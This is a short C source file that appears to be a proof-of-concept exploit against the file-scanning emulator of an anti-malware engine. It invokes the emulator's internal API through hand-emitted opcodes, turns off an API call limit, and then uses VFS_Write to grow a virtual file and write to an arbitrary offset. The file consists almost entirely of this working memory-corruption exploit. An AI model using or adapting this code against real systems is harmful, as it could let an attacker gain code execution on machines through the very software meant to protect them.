#include <windows.h>
#include <stdint.h>
#include <stdlib.h>
#include <limits.h>

#pragma pack(1)
#pragma comment(linker, "/SECTION:.text,ERW")

uint32_t crcstr(unsigned char *message) {
   int i, j;
   unsigned int byte, crc, mask;

   i = 0;
   crc = 0xFFFFFFFF;
   while (message[i] != 0) {
      byte = message[i];            // Get next byte.
      crc = crc ^ byte;
      for (j = 7; j >= 0; j--) {    // Do eight times.
         mask = -(crc & 1);
         crc = (crc >> 1) ^ (0xEDB88320 & mask);
      }
      i = i + 1;
   }
   return crc;
}

DWORD MpApiCall(PCHAR Module, PCHAR ProcName, ...)
{
    DWORD Result;
    DWORD ApiCrc;

    ApiCrc = crcstr(Module) ^ crcstr(ProcName);

    _asm {
        mov     eax, dword ptr ApiCrc
        mov     [apicode], eax
        mov     ebx, esp
        lea     esp, ProcName
        _emit   0x0f
        _emit   0xff
        _emit   0xf0
    apicode:
        _emit   0x00
        _emit   0x00
        _emit   0x00
        _emit   0x00
        mov     esp, ebx
        mov     Result, eax
    }

    return Result;
}

int main(int argc, char **argv)
{
    BYTE Buf[8192];
    HANDLE Handle;

    MpApiCall("NTDLL.DLL", "NtControlChannel", 0xA);    // Disable apicall limit

    ZeroMemory(Buf, sizeof Buf);

    Handle = (HANDLE) MpApiCall("NTDLL.DLL", "VFS_Open", L"filename", TRUE);

    // Extend the size, but don't write any data.
    MpApiCall("NTDLL.DLL", "VFS_Write", Handle, Buf, 0, 0xffffffff, 0);

    // Now we can write to an artbirary offset.
    MpApiCall("NTDLL.DLL", "VFS_Write", Handle, Buf, 0x7ff, 0x41414141, 0);

    return 0;
}
